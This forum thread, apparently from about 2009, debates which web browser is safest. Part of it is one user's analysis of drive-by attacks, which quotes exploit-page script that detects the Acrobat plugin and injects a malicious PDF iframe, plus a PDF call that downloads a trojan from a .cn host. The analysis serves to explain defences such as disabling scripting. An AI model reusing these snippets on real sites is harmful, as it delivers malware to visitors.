What is your opinion on the safest browser? I'm using Google Chrome and I love it. I also like Opera, and K-Meleon.

Wrong section sorry, please move it.

-{ Quote: "What is your opinion on the safest browser? I'm using Google Chrome and I love it. I also like Opera, and K-Meleon." }-Funny that I precisely have the same happy tapdancers here, but in this order:
1) K-Meleon
2) Opera
3) Chrome (Iron)
All of them under Proxomitron's obligation. I also keep on hand the very portable Off by One for the occasional dog's walk. IE lost me a long while ago and I keep it hoppy as is.

In my opinion the safest is Opera.

i use IE 6 and never have any problems;D

My vote would go for Opera. I have used them for years and have never had any sort of security issue. On a side note, Proxomitron was mentioned and while it is very good it is for advanced users, meaning you should know what you are doing before messing around with the CSS filters. Otherwise things could start looking very strange.

-{ Quote: "i use IE 6 and never have any problems;D" }-
so you say: no risk no fun? ;D

My vote for Opera :thumb:

Is this a browser with security add ons aka Noscript, Adblock Plus or just a plane browser with no add ons???

-{ Quote: "Is this a browser with security add ons aka Noscript, Adblock Plus or just a plane browser with no add ons???" }-

That is a good point. I would consider AdMuncher, Proxomitron, NoScript, etc. addons. That being said, my vote is the same for both tweaked and out-of-the-box browsers. But the initial question needs to be defined further.

I guess the browser targeted the least by criminals is the safest, I would go with Opera (according to Secunia Opera has zero unpatched leaks, but that doesn't say much)

The safest browser is any sandboxed browser.

-{ Quote: "The safest browser is any sandboxed browser." }-

That true. I recommend Sandboxie to anyone and everyone as the first line of defense. Well little is needed after that, except Shadow Defender.

-{ Quote: "i use IE 6 and never have any problems;D" }-
I only use IE 6 as my browser.

Plenty of risk, plenty of fun, but never a problem!

With the right security measures it is very difficult to get hit through your browser, whatever one you use. So you may as well use the one you like.

-{ Quote: "so you say: no risk no fun? ;D

My vote for Opera :thumb:" }-exactly;) plus i want to zqueez defensewall and malware defender;) i paid to be protected;D well i guez you are correct no risk no fun:)

-{ Quote: "I only use IE 6 as my browser.

Plenty of risk, plenty of fun, but never a problem!

With the right security measures it is very difficult to get hit through your browser, whatever one you use. So you may as well use the one you like." }-
I agree, and IE8 seems to be even safer than the others. I'm using Chrome because of its speed and simplicity, security depends on other parameters.

-{ Quote: "What is your opinion on the safest browser? I'm using Google Chrome and I love it. I also like Opera, and K-Meleon." }-
.
I would have a look at IE 8.0 since there are number of new security features, such as the "screen filter" (enhanced version of the phishing filtering in IE 7). That said I don't think of any browser as being especially secure. They all need to be hardened in every way possible with add-ons, plus a good underlying suite of security applications for the OS.

My vote goes to IE8 and Chrome for their architecture, and Opera for the inherent quality of its code even though it lacks other security mechanisms.

With built-in Protected Mode, anti-XSS defenses, InPrivate Filtering, and a phising/malware filter that is reportedly more than twice as effective as its closest competitor, IE8 may very well happen to be *gasp* the most secure browser at the moment.

This topic has been discussed several times before and I have to agree with funkydude :thumb:.

-{ Quote: "The safest browser is any sandboxed browser." }-

Opera, been using it for years and has never let me down.

C'mon folks -- you are all behind the times. The safest and fastest browser -- bar none -- is the amaaazing Lynx (http://lynx.isc.org/). Open source, of course.

(Well... yeah, Lynx is a bit spartan. But the browser's availability of eye-candy wasn't included in the topic's question.) woof! *puppy*

-{ Quote: "I only use IE 6 as my browser.

Plenty of risk, plenty of fun, but never a problem!

With the right security measures it is very difficult to get hit through your browser, whatever one you use. So you may as well use the one you like." }-

When I recall correctly, you have great knowledge in protecting the registry (I thought you gave me a few tips years ago when I used Regdefend, thx), so "the right security measure" is a bit a-typical (meaning your registry defense :D :thumb: ) and not available to everyone.

Cheers

Well yes, if someone doesn't know how to secure a system then they would be better off not using IE 6. However simple patching of windows goes a long way to preventing an exploit succeeding. When enthusiasts go hunting for drive-by malware attacks they always find it necessary to remove the latest patches, even with IE 6, so for the most part people will be safe with a little bit of hardening and common sense.

yes a hips program will cover me here;)

Haven't you guys ever heard of MOZILLA FIREFOX??? ??? ???

-{ Quote: "Haven't you guys ever heard of MOZILLA FIREFOX??? ??? ???" }-
Yes we have, but it's not mentioned here anyway for good reason.

I know that you have heard about it but what is the opinion for FF. I like it .it is simple and safe i guess.

-{ Quote: "I know that you have heard about it but what is the opinion for FF. I like it .it is simple and safe i guess." }-
Like its other major competitors, it's a nice browser that will probably serve your needs quite well. It's just that it isn't really a contender when it comes to the question of "safest".

-{ Quote: "Like its other major competitors, it's a nice browser that will probably serve your needs quite well. It's just that it isn't really a contender when it comes to the question of "safest"." }-
Firefox with NoScript should be very safe I think?

-{ Quote: "I know that you have heard about it but what is the opinion for FF. I like it .it is simple and safe i guess." }-

With or without extensions/add-ons?

-{ Quote: "Like its other major competitors, it's a nice browser that will probably serve your needs quite well. It's just that it isn't really a contender when it comes to the question of "safest"." }-

So then what are the real contenders when it comes to the question of being "safest" ?

-{ Quote: "Yes we have, but it's not mentioned here anyway for good reason." }-
Which reason?

Bellgamin hit the nail on the head. :thumb:

Not the most exciting or pretty by far. Far from being well known. But the question concerned secure\security.

Text only is the way to go.

Opera is also my first choice. Right now I'm testing the new Opera 10 Alpha with Turbo, which is quite a bit faster than their previous versions.

For my second choice I'll vote for Maxthon 2.5.2. even though it uses IE 8 as it's rendering engine, but has more security features which I like.

Is there much security risk in setting IE 8 as the default browser ?

Does much known malware use the default browser setting when it tries to phone home ?

Opera, IMO -- less popular than FF so it's less targeted.

FF w/ NoScript, Adblock Plus, and WOT is as safe as a browser can get IMHO.

Never had a security issue since installing those add-ons.;D

100% highly recommended for FF users :thumb:

Hi Guys!

On this site can you see how secure your browser is,
My current browser Safari BETA 4.0 for Windows got good results !-)

http://www.useragentstring.com/

SweX

-{ Quote: "Hi Guys!

On this site can you see how secure your browser is,
My current browser Safari BETA 4.0 for Windows got good results !-)

http://www.useragentstring.com/

SweX" }-

As did Opera here.......

Opera always gets U here, its one of the most secure and fastest patched browser there.

-{ Quote: "Hi Guys!

On this site can you see how secure your browser is,
My current browser Safari BETA 4.0 for Windows got good results !-)

http://www.useragentstring.com/

SweX" }-
Sorry, but that's, er, kind of silly.

That site just reports what your useragent string is telling it. It's got nothing to do with how secure your browser actually is.

YES it tells you how secure your useragentstring is yea ::)
And if you don't get the U then it's not secure!

But calling it a "silly" site hmm don't know if it's that silly is it :-\

However, if you know of a browser security tester site that is not "silly"
then you can post it here, thank you.

But this was the best i could do :-*

SweX

Any browser can be made safe. Might as well pick one you enjoy using.
Some (like Opera & Chrome) take less work to make safe, when compared to some others (FF).

As a side note, anyone using Chrome?

According to this (http://eval.symantec.com/mktginfo/enterprise/white_papers/b-whitepaper_internet_security_threat_report_xiv_04-2009.en-us.pdf) [page 40-41]:

-{ Quote: "In 2008, Symantec documented a total of 419 vulnerabilities in plug-in technologies for Web browsers. Of the total for 2008, 287 vulnerabilities affected ActiveX, which is significantly more than any other plug-in technology." }-

The total number of vulnerabilities affecting the following Web browsers 2008 [page 38]:

-{ Quote: "99 (Mozilla)
47 (Internet Explorer)
40 (Safari)
35 (Opera)
11 (Chrome)" }-

So the safest browsers are: Safari, Opera, Chrome?! ???

-{ Quote: "With the right security measures it is very difficult to get hit through your browser, whatever one you use. So you may as well use the one you like." }--{ Quote: "Any browser can be made safe. Might as well pick one you enjoy using." }-Nothing more to say, really...

Nonetheless, I'll add that I've tested every exploit site in the wild I've seen mentioned and have yet to find one that has compromised Opera. (Note that I said exploits in the wild, not vulnerabilities listed in surveys).

Now, not all exploits are browser-specific. Those that target applications with plugins for the browser, for example. In these cases, it requires the user to configure the browser properly so that the exploit doesn't bypass the normal Download protection the browser has.

----
rich

The WinAntiVirus exploit has been called a browser exploit because the fake scan starts automatically, leading to the download of malware.

Typically, the user is redirected from a legitimate website to the fake scan site, which has javascript code such as

script src='fileslist.js'
script src='progressbar2.js'
script src='common.js'

These files load the images for the scan. If scripting is disabled in the browser, the files don't cache, and all the user sees is a blank page:

208513

If scripting is enabled, then the fake stuff starts:

http://www.wilderssecurity.com/attachment.php?attachmentid=202212

Whereupon, the user is confronted with alerts that the computer is worse than a rat's nest because "critical level threats" were not removed, so that this great product is needed to save the day:

http://www.wilderssecurity.com/attachment.php?attachmentid=202207

A brief Quiz:

How does this product get downloaded?

1) The browser does it automatically

2) The user clicks to download.

For those that need to do some research on this, I'll give you some time and return later with the answer.

----
rich

I hope you agree that the user initiates the download.

So, is WinAntiVirus2009 a browser exploit? Or a user error?

Today's browsers allow you to configure site preferences. In Opera, first you disable Javascript Globally:

208516

Then you enable javascript for your trusted sites - here, Wilders:

208514

This means that any site linked from Wilders will not have Javascript enabled. Here, I click on the link to the article in the post:

208515

So, the WinAntiVirus exploit would fail to initiate with this configuration.

I think this is a great feature. You have to be sympathetic for certain people who might fall for this fake scan trick, if they have no real understanding about these things.

Setting up scripting this way is not difficult to teach, and it certainly will avoid many of the exploits today that require scripting just to start!

----
rich

-{ Quote: "
So the safest browsers are: Safari, Opera, Chrome?! ???" }-

These figures are rather bogus. Read my answer here (http://www.wilderssecurity.com/showpost.php?p=1418176&postcount=2).

-{ Quote: "These figures are rather bogus. Read my answer here (http://www.wilderssecurity.com/showpost.php?p=1418176&postcount=2)." }-
With all due respect, the days where Mozilla can tout its security as a selling point over its competitors are long gone. The sooner it can wake up to this and focus on catching up, the better.

-{ Quote: "With all due respect, the days where Mozilla can tout its security as a selling point over its competitors are long gone. The sooner it can wake up to this and focus on catching up, the better." }-
You still have not explained why you dont think firefox is a secure browser.

-{ Quote: "With all due respect, the days where Mozilla can tout its security as a selling point over its competitors are long gone. The sooner it can wake up to this and focus on catching up, the better." }-
Maybe you should tell them this. ;)

But Firefox has the best update manager, even ordinary Joe will get all updates :thumb:

-{ Quote: "But Firefox has the best update manager, even ordinary Joe will get all updates :thumb:" }-
IE, Chrome, Opera, and Safari all come with automatic updates, or at the very least notifications.

-{ Quote: "You still have not explained why you dont think firefox is a secure browser." }-
Firefox is reasonably secure, in more or less the same way that IE6 is secure if you keep up with all the security patches. All I'm saying is that Firefox is seriously lagging behind its competitors in this area.

-{ Quote: "Yes we have, but it's not mentioned here anyway for good reason." }-

Why is that..?

-{ Quote: "Why is that..?" }-
Try reading the thread.

-{ Quote: "IE, Chrome, Opera, and Safari all come with automatic updates, or at the very least notifications." }-

Look at this (http://www.wilderssecurity.com/showthread.php?t=241393) ::)

The safest browser is a browser that is in a Sandbox. Period.

So why not just use a browser that you like the most?

-{ Quote: "Look at this (http://www.wilderssecurity.com/showthread.php?t=241393) ::)" }-


Google is beta so its a constant process, in case of FF, there were many serious unpatched flaws which needed rectification. Opera has never had a serious hole left open for long, all one needs to do is check Opera's record at Secunia.

-{ Quote: "Google is beta so its a constant process, in case of FF, there were many serious unpatched flaws which needed rectification. Opera has never had a serious hole left open for long, all one needs to do is check Opera's record at Secunia." }-

May be, but: The update process in Safari & Opera is bad because there is no automatic update :thumbd: Ordinary Joe will rarely get an update as you can read in the article ...

I agree with a number of posters, in that the safest browser is a 'Sandboxed' one.

However, saying that, I use FF (always updated), along with Adblock Plus and NoScript, combined with the MVPS Hosts file (always updated - I utilize HostsXpert), and have never encountered an issue.

Sometimes I might tinker with Sandboxie, if I feel the need to, and very rarely use IE8.

I may even have a look at Opera.

You can make a distinction between security (how vulnerable you are if attacked) and safety (how likely you are to be attacked).

Opinions

Someone identified as "DCT" who wrote malware in Russia and was interviewed (http://www.securityfocus.com/news/11476) 2 years ago, suggested people use Opera with scripts and plug-ins disabled in order not to be a victim of an attack with his group's software (MPack).


Charlie Miller (who worked at the NSA for 5 years, co-author of The Mac Hackers Handbook, and a winner at this year's Pwn2Own) stated in an interview (http://blogs.zdnet.com/security/?p=2941) in March that given all the browers (Opera wan't included) on all the platforms (Linux also wasn't included) at Pwn2Own this year, he felt the hardest target was Firefox on Windows Vista/7.


Dino A. Dai Zovi (who worked on the Sandia National Laboratories IDART in college, co-authored The Mac Hackers Handbook, and a winner at Pwn2Own 3 years ago) recommended in an interview (http://www.tomshardware.com/reviews/dino-dai-zovi,2260.html) last month that:-{ Quote: " "If security is your highest priority, I would recommend Chrome for any user on any operating system that it supports. Chrome has leap-frogged the other Web browsers in terms of security due to its innovative multi-process sandbox model. Chrome is even more secure on Windows Vista and Windows 7." " }-But he also stated that he personally used Safari for his everyday browsing (for the UI), Firefox on financial sites (for more security), and Chrome running on Vista x64 within a VMWare Fusion VM for secure development - on separate Macs.

Talk, talk talk...yak,yak, yak... contests...lists...bull-oney -- go to a malicious URL and test. That's the only way to verify an opinion. I try them all, and none are successful.

Any thing other than testing exploits in the wild is irrelevant, and is nothing more than market hype and speculation.

So there!

----
rich

-{ Quote: "Talk, talk talk...yak,yak, yak... contests...lists...bull-oney -- go to a malicious URL and test. That's the only way to verify an opinion. I try them all, and none are successful.

Any thing other than testing exploits in the wild is irrelevant, and is nothing more than market hype and speculation.

So there!

----
rich" }-

What a mature, intellectual post, I think not.

Engage brain before operating fingers.

If you can't post a sensible, constructive response, then don't bother posting at all.

What can be more constructive than testing exploits? I gave one example already in a previous post.

----
rich

-{ Quote: "What a mature, intellectual post, I think not.

Engage brain before operating fingers.

If you can't post a sensible, constructive response, then don't bother posting at all." }-
You should heed your own words my friend. Rmus' post was probably the only intelligent one yet.

-{ Quote: "May be, but: The update process in Safari & Opera is bad because there is no automatic update :thumbd: Ordinary Joe will rarely get an update as you can read in the article ..." }-


Whenever there is new version of Opera, an update is offered. I prefer it that way as I might not want my browser to be patched. Its about choice and I would hate it being done behind my back.

-{ Quote: "What can be more constructive than testing exploits? I gave one example already in a previous post." }-
Exactly! Then again if we knew how malware worked then we wouldn't have anything to argue about. From reading your posts it looks like the browsers are safe and it's the user or plug ins that are being "exploited".

Do you know of any real examples of a browser vulnerability (old or new) in the wild?

-{ Quote: "You should heed your own words my friend. Rmus' post was probably the only intelligent one yet." }-

The following is called intelligent??

'...Talk, talk talk...yak,yak, yak... contests...lists...bull-oney --go to a malicious URL and test (stupid, to The extreme) . That's the only way to verify an opinion. I try them all, and none are successful...'

Besides, pretty pictures are one thing................... Proof is another............... ;)

-{ Quote: "Talk, talk talk...yak,yak, yak... contests...lists...bull-oney -- go to a malicious URL and test. That's the only way to verify an opinion. I try them all, and none are successful.

Any thing other than testing exploits in the wild is irrelevant, and is nothing more than market hype and speculation.

So there!

----
rich" }-
:blink: :blink: :blink:

Rich,

Unfortunately, we all can't spend our time testing software or studying computer security to the degree necessary. Some of us need to know the opinions and experiences of professionals and others (which therefore aren't completely irrelevant) in order to help us form our own conclusions, such as your own valuable experiences testing real malware.

But how much more experience with in the wild browser exploits do professionals who create or analyze real malware for a living need in order for you not to consider their opinions about browser security and safety 'bull-oney'? ???

They have light-years more experience testing real malware than me, and maybe even more experience than you. :-\

-{ Quote: "They have light-years more experience testing real malware than me, and maybe even more experience than you. ::)" }-
Are their claims reproducible? Verifiable? Can they be tested?

Those men are not scientists speaking about the results of scientific, controlled testing. At best they're offering their opinion. It would be silly to reduce computer security to the level of religion, where the words of the so-called "authorities" are unquestioningly taken as gospel.

-{ Quote: " From reading your posts it looks like the browsers are safe and it's the user or plug ins that are being "exploited". Do you know of any real examples of a browser vulnerability (old or new) in the wild?" }-I prefer the phrase, "exploit in the wild" because there are many reported vulnerabilities that never become exploits in the wild. It's just my way of distinguishing what is in the wild and what is not. It's not that I don't pay attention to vulnerabilities, I just don't get too excited about them...

I'm not aware of any exploits in the wild that target code in Opera or Firefox. I can't speak for other browsers. But there are numerous exploits that target IE, and an interesting tactic in use now is to serve up the same trojan in a webpage-based attack using different exploits depending on the user's Browser.

One recently served up a PDF exploit targeting the Acrobat Plugin for Opera and Firefox:


<script
name = navigator.plugins[i].name;

if((name.indexOf("Adobe Acrobat") != -1) || (name.indexOf("Adobe PDF") != -1))
{

document.write ('<i frame src="pdf.pdf"></i frame>');
</script


You can see that with scripting disabled in the Browser, the exploit fails, since the code contains the script tag. To show the pay load trojan, I let the exploit run and we can see the code in the PDF file that calls out to download the trojan, load.exe


URLMON.DLL. URL DownloadToFileA.
http://XXXXXX.cn/load.php?id=4..


http://www.wilderssecurity.com/attachment.php?attachmentid=208020

You can see by the firewall alert and the program that attempts the download that this is an exploit against the Acrobat Plugin and not the browser. Nonetheless, disabling scripting in the browser provides the first layer of protection. Another layer of protection in the browser is to disable the Acrobat Plugins. This, of course, applies to all browsers!

Connecting to the same page with IE, a different exploit targeting IE attempts to download the same trojan:

http://www.wilderssecurity.com/attachment.php?attachmentid=208506&d=1241152145

A quick check at Virus Total showed the two load.exe files to be the same.

I didn't look at the source code, so am not sure which specific exploit against IE this was. Some old ones still in use are:

MS08-041 - ActiveX Control for the Snapshot Viewer Exploit
MS06-014 - Microsoft Data Access Components (MDAC) Function Exploit

The dates (2008, 2006) are when they were patched! That these continue to be used with success says something...

New ones target IE7 but I don't have that version, so I haven't tested. But they are all the same: some weakness in the code (if unpatched) allows for remote code execution, usually to download a trojan.

Another site had 2 different codes for PDF exploits, according to the browser. In addition to the code above for Acrobat Plugins in Opera and Firefox, this was served up to the IE browser:

<script>
function pdfswf()
{
obj = new ActiveXObject(PDF[i]);
document.write ('<i frame src="http://sitesupports.cn/cache/readme.pdf"></i frame>');

You may recognize the reference to ActiveX which will trigger the Acrobat plugin for IE.

I know that it's cool to criticize the IE browser, but right off hand I can think of 3 people who have used IE since at least IE3 or IE4 with no problems. You just have to keep up with things and learn how to properly configure it. They aren't bothered by all of the hoopla against IE. I can imagine at least one retorting to the criticisms,

"Just because his shoes are too tight, why should my feet hurt?"

----
rich

-{ Quote: "
But how much more experience with in the wild browser exploits do professionals who create or analyze real malware for a living need in order for you not to consider their opinions about browser security and safety 'bull-oney'? ???

They have light-years more experience testing real malware than me, and maybe even more experience than you. ::)" }-The "bull-oney" was in reference to much of what has been parroted in this thread, not about opinions of experts. Unfortunately, when it comes to browsers, I don't find objective testing of real exploits out there. If there were, you wouldn't find people nitpicking between Firefox and Opera, for example, because both browsers provide a secure and safe experience on the web when configured properly.

That's why I do my own tests and advise people I help accordingly.

----
rich

-{ Quote: "The "bull-oney" was in reference to much of what has been parroted in this thread, not about opinions of experts. Unfortunately, when it comes to browsers, I don't find objective testing of real exploits out there. If there were, you wouldn't find people nitpicking between Firefox and Opera, for example, because both browsers provide a secure and safe experience on the web when configured properly.

That's why I do my own tests and advise people I help accordingly." }-----
'...because both browsers provide a secure and safe experience on the web when configured properly...

Now, that's a much nicer approach. Exactly my point. Same as IE8, when it's properly configured, he says dubiously.

-{ Quote: "But how much more experience with in the wild browser exploits do professionals who create or analyze real malware for a living need in order for you not to consider their opinions about browser security and safety 'bull-oney'? ??? " }-More on this, as two instances come to mind.

One, during the rash of autorun.inf exploits a while back. A respected security analyst was interviewed -- his company had identified a new trojan that was being used in USB attacks. He stated that the exploit could re-enable Autorun if it were disabled on the user's machine. I contacted him about this neat trick: how could the exploit run to renable autorun if autorun were disabled, and would he share his analysis, being curious as to how this could take place. He declined, saying that it was proprietory. Finally after several more emails, he said that he had been misquoted by the interviewer. Meanwhile, another AV vendor posted a complete analysis, proving his statement to be incorrect, and it was easily verifiable with a simple test.

Another example, upon the return of the MBR rootkit late last year, Sinowal/Mebroot. A well-respected Security Newsletter editor made this astounding statement:

-{ Quote: "Truth be told, there is no single way to reliably protect yourself from Sinowal/Mebroot, short of disconnecting your computer from the Internet and not opening any files. " }-I wrote and asked if he were aware that f-secure had listed all of the web-based exploits in use, and that they were just tried and true drive by attacks, easily blocked by proper protection.

His statement above followed these comments, which explain his reasoning:

-{ Quote: "Your antivirus program may help, for a while. Time and time again, however, Sinowal/Mebroot's creators have modified the program well enough to escape detection." }-Mired in the old concept that AV is the only protection, you can see his outmoded thinking.

By the way, he also neglected to mention that all of the attacks were against unpatched versions of IE.

So much for (some) security professionals.

You need to be alert and discriminating in what you read.

----
rich

-{ Quote: "Same as IE8, when it's properly configured, " }-I understand that IE8 with Vista has many new security features.

----
rich

-{ Quote: "The "bull-oney" was in reference to much of what has been parroted in this thread, not about opinions of experts." }-
Since your post came right after mine and the remark about "contests...lists...bull-oney" seemed directed at the Pwn2Own contest, some winners of which I referenced, I couldn't see what else those words referred to but my previous post.

Sorry if I misunderstood you.

I agree there was much hype in the media about that contest, for example, that neglected quite a few important details, including limits to the usefulness of any knowledge gained from such events.

-{ Quote: "So much for (some) security professionals.

You need to be alert and discriminating in what you read." }-
No doubt.

-{ Quote: "I prefer the phrase, "exploit in the wild" because there are many reported vulnerabilities that never become exploits in the wild. It's just my way of distinguishing what is in the wild and what is not. It's not that I don't pay attention to vulnerabilities, I just don't get too excited about them...

I'm not aware of any exploits in the wild that target code in Opera or Firefox. I can't speak for other browsers." }-
Thanks for your reply Rich. You make a good point about "Exploit in the wild" and it makes sense. It also makes sense to focus on them as they are the real and current threat/s.

If you do hear of any browser only exploits in the wild please let us know.

Regards,
IP

Over the years when it comes to malware prevention, I've found a lot of power lies within in the browser itself. A good web filter helps too. ;)

In my opinion, Lynx is the safest browser (since it's text-only).

Almost all browsers in mainstream use are vulnerable in some shape or form, be it JavaScript, malicious image files (WMF, ANI), Flash, etc. Basically, the more "media-rich" the browser, the more attack vectors there are.

I use Opera, Firefox and Chromium equally, all with Proxomitron. I liked the functionality of NoScript in Firefox so much that I felt I needed the same protection in Opera and Chromium (and other browsers), so I wrote a Proxomitron filter for this purpose.

Test Center: How secure is Firefox? (http://www.infoworld.com/d/security-central/test-center-how-secure-firefox-282?page=0,0)
Test Center: How secure is Opera? (http://www.infoworld.com/d/security-central/test-center-how-secure-opera-620?page=0,0)
Test Center: How secure is Google Chrome? (http://www.infoworld.com/t/applications/test-center-how-secure-google-chrome-443?page=0,0)
Test Center: How secure is Internet Explorer? (http://www.infoworld.com/d/applications/test-center-how-secure-internet-explorer-343)
Test Center: How secure is Safari? (http://www.infoworld.com/d/security-central/test-center-how-secure-safari-228)

The safest browser is the person operating the computer - if he / she wants to be! :dry:

-{ Quote: "
I'm not aware of any exploits in the wild that target code in Opera or Firefox. " }-

From http://www.viruslist.com/en/analysis?pubid=204792056:

-{ Quote: "Malware exploit kits serve as the engine for drive-by downloads. These kits are professionally written software components that can be hosted on a server with a database backend. The kits, which are sold on underground hacker sites, are fitted with exploits for vulnerabilities in a range of widely deployed desktop applications, including Apple’s QuickTime media player, Adobe Flash Player, Adobe Reader, RealNetworks’ RealPlayer, and WinZip.

Browser-specific exploits have also been used, targeting Microsoft’s Internet Explorer, Mozilla’s Firefox, Apple Safari, and Opera. Several targeted exploit kits are fitted only with attack code for Adobe PDF vulnerabilities or known flaws in ActiveX controls." }-

From http://tech.yahoo.com/news/pcworld/20090620/tc_pcworld/couldoperaunitebeabotmastersbestfriend:

-{ Quote: "Opera attack code is already included in the majority of browser attack tools that Jackson has studied. With Unite, he expects the hackers who write browser attack software to pay even more attention to Opera. "I think there will be a push to keep your exploit kit in marketable condition by developing exploits for Opera 10," he said." }-

There is no such thing as the safest browser.

Use the browser you like, learn how to use it and surf smart. Putting a browser in a sandbox does not make the browser more safe it simple adds a layer of protection to a browser that may have security holes.

Threads like this really accomplish nothing.

Thanks for the references.

-{ Quote: "From http://www.viruslist.com/en/analysis?pubid=204792056: " }-I wish the author would have shown an exploit pack with an Opera exploit. His example (Mpack I think) is the most common pack for sale, and contains just the usual IE stuff. I'm left wondering what the specific exploits used against the other browsers were. All previous vulnerabilities for Firefox and Opera have been patched.

This will bear watching...

-{ Quote: "From http://tech.yahoo.com/news/pcworld/20090620/tc_pcworld/couldoperaunitebeabotmastersbestfriend:" }-Opera Unite has caused a furor already - this Platform is a disaster waiting to happen.

If this is a "feature" that won't be optional, I know several people who have indicated they would abandon Opera.

rich

I don't know what the safest browser is, but I'm happy with Opera. It, as of now, isn't so insecure it would bother me, and yet it has a rich set of features for actual web browsing that I like that I can find on no other browser (at least not without planting a ton of extensions on the browser).

-{ Quote: "
Test Center: How secure is Opera? (http://www.infoworld.com/d/security-central/test-center-how-secure-opera-620?page=0,0)" }-

The articles appear to be outdated. Opera 9.64 supports DEP and ASLR. Which, by the way, don't do nearly as much as the article seems to imply. Good technologies, sure, but they don't have nearly as great an impact as being able to control scripting and plugins for each site and setting a default disabled for both - which is something you can't do with, say, Firefox, without extensions like NoScript.

-{ Quote: "I wish the author would have shown an exploit pack with an Opera exploit. His example (Mpack I think) is the most common pack for sale, and contains just the usual IE stuff. I'm left wondering what the specific exploits used against the other browsers were. All previous vulnerabilities for Firefox and Opera have been patched." }-

If you are prone to being cynical, like I am, you might note the source of the article - viruslist.com or in other words Kaspersky. AV companies don't exactly have a clean track record of telling things like they are and not partaking in hype and FUD. My general rule of BS dictates that whenever an AV company claims that something is exploitable and indeed being exploited now, but doesn't offer any kind of reference or proof at all, not even one tiny example, they're either lying or greatly exaggerating to market their own AV products as necessary.

As for exploit packs in general, all that I have seen will use perhaps a couple of the latest ones and mostly very old ones (months, even years old). Most of the exploits will be against IE, of course. If there is an Opera exploit in there - never seen one actually in the wild, same as you - it will almost certainly be one that was patched months ago.

-{ Quote: "This will bear watching...

Opera Unite has caused a furor already - this Platform is a disaster waiting to happen.

If this is a "feature" that won't be optional, I know several people who have indicated they would abandon Opera.
" }-

I am one of those people who will jump ship if Opera doesn't toss "Unite" or at least give me a version that does not have Unite built-in. I just don't want anything like that, ever. It is a security disaster waiting to happen, no matter how they may have tried to sandbox it. Not to mention that it is incredible bloat. If I want a web server, I will run Apache. I want my browser to be a browser, not a server.

for me fire fox is the safest. mozilla firefox plus an av solution. is the best. preferably to have an anti spam toolbar

My favorite browser is Mozilla! It has all the features that can satisfy me and also a lot of useful plug - ins that integrate perfectly into it!

Anything inside Sandboxie (cliche/fanboyism I know)

I like Opera ... be nice if Opera had Add Ons, NoScript for the win!

I often see people saying they're still using IE6 and how it's never let them down ... makes me wonder if there is some esoteric thing going on like the rest of us don't know what we're missing.

http://news.zdnet.co.uk/security/0,1000000189,39693874,00.htm

But when I find out the majority of British Ministry of Defense still uses IE6 I know this is just a horrible mistake just waiting to happen. Ughhh

Firefox 3.5.1 plus security add-on.. Plus a lot of these others like Chrome, Opera and Safari which I did try and found only Opera to work with adsweep.js. Opera 9.6 had crashed more can't load certain pages like QVC doesn't like Opera. I upgraded to Opera 10 beta I know it's still in beta but adsweep.js failed then ads pops like mad. Still right now Firefox with Vista Aero themes is the closes to IE7 features. Firefox has virus defs from Avira every is scanned security seems okay but I still run the browser in isolated sandbox using Geswall and Keyscrambler with it. Added Spyware Blaster. Again not a lot of stuff works with Opera.

-{ Quote: "I often see people saying they're still using IE6 and how it's never let them down ... makes me wonder if there is some esoteric thing going on like the rest of us don't know what we're missing." }-Nothing esoteric at all -- just users understanding how to secure the browser.

I've got IE6 installed on both my Win2K and WinXP systems. IE is not my primary browser, but up until recently, I used to browse with it from time to see if I could randomly pick up some web-based exploit that was going around. I never found anything. It made me wonder how it is that people pick up these infected pages!

I keep my IE6 unpatched so that when I see malicious URLs posted in exploit notifications, I go to the site to test other security and the exploit always fails.

If you look at the malware packages that contain IE6 exploits, you find they are all long-since patched. The multitude of people who are infected by an IE exploit don't patch, don't have other security in place to block remote code execution exploits in case of a 0-day scenario.

The conficker fiasco is a good example: The MS08-067 patch which addressed the vulnerability which the conficker worm later exploited was released on October, 2008

Microsoft Security Bulletin MS08-067 – Critical
http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx

The first exploit of that vulnerability occured one month later:

ms08-067 exploitation
http://isc.sans.org/diary.html?storyid=5288
-{ Quote: "we've caught an MS08-067 exploitation attempt and provide the
trace and a brief analysis here: " }-Conficker, aka W32.Downadup.B, arrived in December two months after the patch:

MS08-067 Worm on the Loose
http://isc.sans.org/diary.html?storyid=5596
-{ Quote: "Symantec has identified W32.Downadup.B as a new worm that is spreading by taking advantage of the RPC vulnerability from MS08-067. " }-Is this the fault of the browser or the user?

Opera and FireFox have a long list of vulnerabilities that become patched. That is no help unless the user updates. It's no different than with IE. Opera and Firefox users tend to be more security-aware. This, of course, is the minority of browser users world-wide.

People say, Give the average user Firefox. Unless this average user learns to configure FireFox properly and learns how to use the extensions, plugins, etc, Firefox is no more secure than IE against the multitude of exploits that are targeting Acrobat, Foxit, Flash and the like. All of these attacks are triggered by Javascript in the exploit code, so that any of these three browsers, if not properly configured, is susceptible to being the trigger for these exploits.

Now, the story you link to refers to institutions using IE6. Here, we are in a different world since you are dealing with multiple users on a network, and who knows how each individual system/browser is secured. But this is not the fault of the browser: it's user error.

And so you get quotes such as this from the article:

-{ Quote: "So to force them to use the most decrepit browser in the world is a rare form of workplace cruelty that should be stopped."" }- What silly nonsense. The article should state:

Because organizations are often slow to patch and have no security in place that locks down the systems against unwanted executables, and because there is no control over how individual users configure the browser (scripting, etc), companies should switch to a different browser to insure against user incompetence and IT negligence.

IE6 is a fine browser - light and fast. The principal reason I switched to Opera back in Win9x days is that I prefer its features and configurable *.ini files. I never thought much about the security aspect back then. Later, I echoed the growing criticisms of IE until I started looking more closely beneath the surface of things.

----
rich

Rmus, yes it would have been nice to hear a politician care more for the security of the nation they represent rather than the choice to use the latest cool browser. Allowing civil servants in government depts to use whichever browser they wish to is a recipe for disaster, surely?

I have been reading about this Opera Unite (http://unite.opera.com/) service. This sounds potentially like a disaster. Exploiters heaven!

Definitely seems like some gimmick to attract the kids to Opera.